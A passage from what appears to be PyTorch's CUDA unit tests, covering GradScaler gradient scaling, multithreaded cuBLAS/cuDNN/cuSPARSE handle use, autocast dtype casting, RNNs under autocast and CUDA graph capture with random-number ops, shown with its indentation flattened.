scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
